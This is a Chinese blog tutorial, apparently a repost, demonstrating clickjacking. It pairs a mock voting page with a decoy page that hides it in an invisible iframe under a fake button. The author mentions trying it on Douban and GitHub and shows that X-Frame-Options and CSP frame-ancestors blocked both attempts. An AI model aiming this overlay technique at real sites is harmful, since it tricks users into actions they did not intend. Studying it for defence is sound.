内容简介:一个关于点击劫持的小示例,首相看下理论知识首先,制作一个功能页面,作为被iframe嵌套的功能页面;这个页面的功能就是模仿投票功能,点击按钮时,即可完成投票功能,控制台会同步打印出操作信息。制作一个只有图片的页面,用于迷惑用户进行交互;
一个关于点击劫持的小示例,首相看下理论知识
项目思路
首先,制作一个功能页面,作为被iframe嵌套的功能页面;这个页面的功能就是模仿投票功能,点击按钮时,即可完成投票功能,控制台会同步打印出操作信息。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
<style>
.vote{
width: 183px;
margin: 0 auto;
margin-top: 220px
}
</style>
</head>
<body>
<div class="vote">
<input type="text" value="5号选手">
<button>投票</button>
</div>
<script>
var span = document.getElementsByTagName('button')[0]
span.addEventListener('click', function(){
console.log('哈哈,谢谢你偷偷帮我投票~')
})
</script>
</body>
</html>
复制代码
制作一个只有图片的页面,用于迷惑用户进行交互;
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>click jacking demo</title>
<style>
body {
padding: 0;
margin: 0
}
.png {
height: 100%;
width: 100%;
}
.iframe {
width: 1440px;
height: 900px;
position: absolute;
top: -0px;
left: -0px;
z-index: 3;
-moz-opacity: 0;
opacity: 0;
filter: alpha(opacity=0);
}
.btn {
display: inline-block;
padding: 2px 3px;
background: burlywood;
color: #fff;
position: absolute;
top: 221px;
left: 766px;
z-index: 2;
cursor: pointer;
border-radius: 30%
}
</style>
</head>
<body>
<img class='png' src="./image/clickme.jpeg" alt="">
<iframe class="iframe" src="./iframe.html" scolling='no' allowTransparency="true"></iframe>
<span class="btn">click</span>
</body>
</html>
复制代码
浏览器打开,会发现根据提示点击按钮,会在控制台中打印了相关的信息,就是说,即使我没有在功能页面进行投票操作,可是能投票。
在迷惑页面中把 iframe 的 opacity 属性值修改成 0.3 ,就能看到这个迷惑的原因了。
其他
本来想做个坏事的,想要试试用于豆瓣上,直接定位到关注按钮那,不过 iframe 豆瓣的页面时,控制台报错了,这个想要说明的是使用设置 X-frame-options 属性是真有效的。
也试过直接内嵌 github 的地址,也会报错,这个错是报跨域的错,不过具体的还不知道是怎么设置防御的。
an ancestor violates the following Content Security Policy directive: “frame-ancestors ... 复制代码
至此,已经把 点击劫持 的形式演示完毕
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- etherscan点击劫持漏洞
- 点击劫持防御方案
- 曲速未来 消息:etherscan点击劫持漏洞分析
- 挖洞经验 | 价值$7500的Google MyAccount服务端点击劫持漏洞(Clickjacking)
- Gradle Plugin Portal:结合点击劫持和CSRF漏洞实现帐户接管
- angular2手动点击特定元素上的点击事件
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
HTML 压缩/解压工具
在线压缩/解压 HTML 代码
SHA 加密
SHA 加密工具